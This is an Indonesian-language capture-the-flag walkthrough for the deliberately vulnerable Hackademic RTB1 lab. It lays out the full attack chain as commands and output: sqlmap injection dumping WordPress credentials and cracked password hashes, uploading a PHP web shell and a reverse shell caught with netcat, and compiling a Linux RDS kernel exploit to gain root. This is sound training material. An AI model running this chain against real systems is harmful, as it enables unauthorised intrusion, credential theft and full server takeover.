Penyelesaian Hackademic_RTB1

>Pertama install Servernya di v-box ato v-mware jg bisa

>jika selesai open new terminal kita scan ip nya. dengan perintah

#netdiscover -i wlan0 -r 192.168.1.0/24 (wlan0nya bisa di ganti dengan eth0.karena ane pake di jaringan wirelles jadi gunakan wlan0)

>setelah discan kita temukan bahwa ipnya adalah 192.168.1.104 . copy ip tersebut ke URL browser kalian.

>klik tulisan Hackademic.RTB1 kemudian klik lagi tulisan Uncategorized (yg ada dibawahnya). liat alamat URLnya berubah menjadi http://192.168.1.104/Hackademic_RTB1/?cat=1 

>selanjutnya copy url tersebuat buka terminal kalian jalankan sqlmap. dengan perintah

#sqlmap -u http://192.168.1.104/Hackademic_RTB1/?cat=1 --dbs

(hasilnya)

available databases [3]:

[*] information_schema

[*] mysql

[*] wordpress

#sqlmap -u http://192.168.1.104/Hackademic_RTB1/?cat=1 -D wordpress --tables

(hasilnya)

Database: wordpress

[9 tables]

+-------------------+

| wp_categories     |

| wp_comments       |

| wp_linkcategories |

| wp_links          |

| wp_options        |

| wp_post2cat       |

| wp_postmeta       |

| wp_posts          |

| wp_users          |

+-------------------+

#sqlmap -u http://192.168.1.104/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --columns

(hasilnya)

Database: wordpress

Table: wp_users

[22 columns]

+---------------------+---------------------+

| Column              | Type                |

+---------------------+---------------------+

| ID                  | bigint(20) unsigned |

| user_activation_key | varchar(60)         |

| user_aim            | varchar(50)         |

| user_browser        | varchar(200)        |

| user_description    | longtext            |

| user_domain         | varchar(200)        |

| user_email          | varchar(100)        |

| user_firstname      | varchar(50)         |

| user_icq            | int(10) unsigned    |

| user_idmode         | varchar(20)         |

| user_ip             | varchar(15)         |

| user_lastname       | varchar(50)         |

| user_level          | int(2) unsigned     |

| user_login          | varchar(60)         |

| user_msn            | varchar(100)        |

| user_nicename       | varchar(50)         |

| user_nickname       | varchar(50)         |

| user_pass           | varchar(64)         |

| user_registered     | datetime            |

| user_status         | int(11)             |

| user_url            | varchar(100)        |

| user_yim            | varchar(50)         |

+---------------------+---------------------+

# sqlmap -u http://192.168.1.104/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users -C user_login,user_pass --dump

(hasilnya)

Database: wordpress

Table: wp_users

[6 entries]

+---------------------------------------------+--------------+

| user_pass                                   | user_login   |

+---------------------------------------------+--------------+

| 21232f297a57a5a743894a0e4a801fc3 (admin)    | NickJames    |

| 50484c19f1afdaf3841a0d821ed393d2 (kernel)   | MaxBucky     |

| 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3)   | GeorgeMiller |

| 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell)  | JasonKonnors |

| a6e514f9486b83cb53d8d932f9a04292 (napoleon) | TonyBlack    |

| b986448f0bb9e5e124ca91d3d650f52c            | JohnSmith    |

+---------------------------------------------+--------------+

========================================================================

buka browser

login ke http://192.168.1.104/Hackademic_RTB1/wp-admin

login menggunakan super user GeorgeMiller | q1w2e3

login dshborad > klik OPTION > klik Miscellaneous > klik conteng ALLOW UPLOAD > pada kolom Miscellaneous tambah extension php

klik UPDATE OPTION

======================================================

klik TAB UPLOAD untuk mengupload backdoor

download backdoor

1. upload shell.php 

catat URL nya <a href='/Hackademic_RTB1/wp-content/shell.php' title=''></a>

buka browser http://99.99.99.7/Hackademic_RTB1/wp-content/shell.php

tampilkan shell

2. upload bekonek.php ke folder /var/www/html/hekdemik/wp-conten/

kemudian edit file bekonek.php ganti dengan IP kali-linux

3. jalankan di terminal nc -lvvp 443

4. jalankan bekonek.php dari browser

http://99.99.99.7/Hackademic_RTB1/wp-content/bekonek.php

5. jalan di terminal whoami

id (enter)

uname -a (enter)

6. upload exploit.c ke wp-content

dari terminal masuk ke /var/www/html/Hackademic_RTB1/wp-content

jalankan perintah sh-4.0$ gcc exploit.c -o sploit

akan muncul file spoit

7. jalan perintah

sh-4.0$ ./sploit

./sploit

[*] Linux kernel >= 2.6.30 RDS socket exploit

[*] by Dan Rosenberg

[*] Resolving kernel addresses...

 [+] Resolved security_ops to 0xc0aa19ac

 [+] Resolved default_security_ops to 0xc0955c6c

 [+] Resolved cap_ptrace_traceme to 0xc055d9d7

 [+] Resolved commit_creds to 0xc044e5f1

 [+] Resolved prepare_kernel_cred to 0xc044e452

[*] Overwriting security ops...

[*] Linux kernel >= 2.6.30 RDS socket exploit

[*] by Dan Rosenberg

[*] Resolving kernel addresses...

 [+] Resolved security_ops to 0xc0aa19ac

 [+] Resolved default_security_ops to 0xc0955c6c

 [+] Resolved cap_ptrace_traceme to 0xc055d9d7

 [+] Resolved commit_creds to 0xc044e5f1

 [+] Resolved prepare_kernel_cred to 0xc044e452

[*] Overwriting security ops...

[*] Overwriting function pointer...

[*] Linux kernel >= 2.6.30 RDS socket exploit

[*] by Dan Rosenberg

[*] Resolving kernel addresses...

 [+] Resolved security_ops to 0xc0aa19ac

 [+] Resolved default_security_ops to 0xc0955c6c

 [+] Resolved cap_ptrace_traceme to 0xc055d9d7

 [+] Resolved commit_creds to 0xc044e5f1

 [+] Resolved prepare_kernel_cred to 0xc044e452

[*] Overwriting security ops...

[*] Overwriting function pointer...

[*] Triggering payload...

[*] Restoring function pointer...

whoami

root

id

uid=0(root) gid=0(root)

============================

Selesai. Semoga Bermanfaat

=======================================================